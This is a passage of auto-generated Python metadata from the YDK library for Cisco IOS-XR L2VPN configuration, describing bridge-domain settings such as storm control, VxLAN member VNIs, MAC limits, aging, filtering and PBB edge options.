'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
''' Kilobits Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
''' Packets Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-storm-control',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls',
False,
[
_MetaInfoClassMember('bd-storm-control', REFERENCE_LIST, 'BdStormControl' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl',
[], [],
''' Storm Control Type
''',
'bd_storm_control',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-storm-controls',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress',
False,
[
_MetaInfoClassMember('mac-address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'mac_address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('next-hop-ip', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Enable Static Mac Address Configuration
''',
'next_hop_ip',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses',
False,
[
_MetaInfoClassMember('member-vni-static-mac-address', REFERENCE_LIST, 'MemberVniStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'member_vni_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni',
False,
[
_MetaInfoClassMember('vni', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' VxLAN Network Identifier number
''',
'vni',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('member-vni-static-mac-addresses', REFERENCE_CLASS, 'MemberVniStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'member_vni_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis',
False,
[
_MetaInfoClassMember('member-vni', REFERENCE_LIST, 'MemberVni' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni',
[], [],
''' Bridge Domain Member VxLAN Network
Identifier
''',
'member_vni',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vnis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit',
False,
[
_MetaInfoClassMember('bd-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'bd_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which MAC
limit action is taken
''',
'bd_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' Mac Address Limit Notification
''',
'bd_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('drop', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC address for filtering
''',
'drop',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-filter',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters',
False,
[
_MetaInfoClassMember('bd-mac-filter', REFERENCE_LIST, 'BdMacFilter' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter',
[], [],
''' Static MAC address
''',
'bd_mac_filter',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-filters',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging',
False,
[
_MetaInfoClassMember('bd-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'bd_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'bd_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac',
False,
[
_MetaInfoClassMember('bd-mac-aging', REFERENCE_CLASS, 'BdMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'bd_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-filters', REFERENCE_CLASS, 'BdMacFilters' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters',
[], [],
''' Filter Mac Address
''',
'bd_mac_filters',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-learn', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'bd_mac_learn',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit', REFERENCE_CLASS, 'BdMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'bd_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-port-down-flush', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable MAC Flush when Port goes Down
''',
'bd_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Mac Withdraw
''',
'bd_mac_withdraw',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-access-pw-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' MAC withdraw on Access PW
''',
'bd_mac_withdraw_access_pw_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-behavior', REFERENCE_ENUM_CLASS, 'MacWithdrawBehaviorEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacWithdrawBehaviorEnum',
[], [],
''' MAC withdraw sent on bridge port down
''',
'bd_mac_withdraw_behavior',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-withdraw-relay', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Mac withdraw sent from access PW to access
PW
''',
'bd_mac_withdraw_relay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-secure', REFERENCE_CLASS, 'MacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure',
[], [],
''' MAC Secure
''',
'mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable nV Satellite Settings
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('offload-ipv4-multicast-enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IPv4 Multicast Offload to Satellite
Nodes
''',
'offload_ipv4_multicast_enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'nv-satellite',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bmac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Backbone MAC address
''',
'bmac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-static-mac-mapping',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings',
False,
[
_MetaInfoClassMember('pbb-static-mac-mapping', REFERENCE_LIST, 'PbbStaticMacMapping' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping',
[], [],
''' PBB Static Mac Address Mapping
Configuration
''',
'pbb_static_mac_mapping',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-static-mac-mappings',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-dhcp-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit',
False,
[
_MetaInfoClassMember('pbb-edge-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'pbb_edge_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which
MAC limit action is taken
''',
'pbb_edge_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
''',
'pbb_edge_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging',
False,
[
_MetaInfoClassMember('pbb-edge-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'pbb_edge_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pbb_edge_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure',
False,
[
_MetaInfoClassMember('accept-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Accept Virtual instance port to be
shutdown on mac violation
''',
'accept_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Virtual instance port MAC
Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac',
False,
[
_MetaInfoClassMember('pbb-edge-mac-aging', REFERENCE_CLASS, 'PbbEdgeMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pbb_edge_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'pbb_edge_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit', REFERENCE_CLASS, 'PbbEdgeMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pbb_edge_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-secure', REFERENCE_CLASS, 'PbbEdgeMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure',
[], [],
''' MAC Secure
''',
'pbb_edge_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge',
False,
[
_MetaInfoClassMember('core-bd-name', ATTRIBUTE, 'str' , None, None,
[(0, 27)], [],
''' Core BD Name
''',
'core_bd_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('isid', ATTRIBUTE, 'int' , None, None,
[('256', '16777214')], [],
''' ISID
''',
'isid',
'Cisco-IOS-XR-l2vpn-cfg', True),
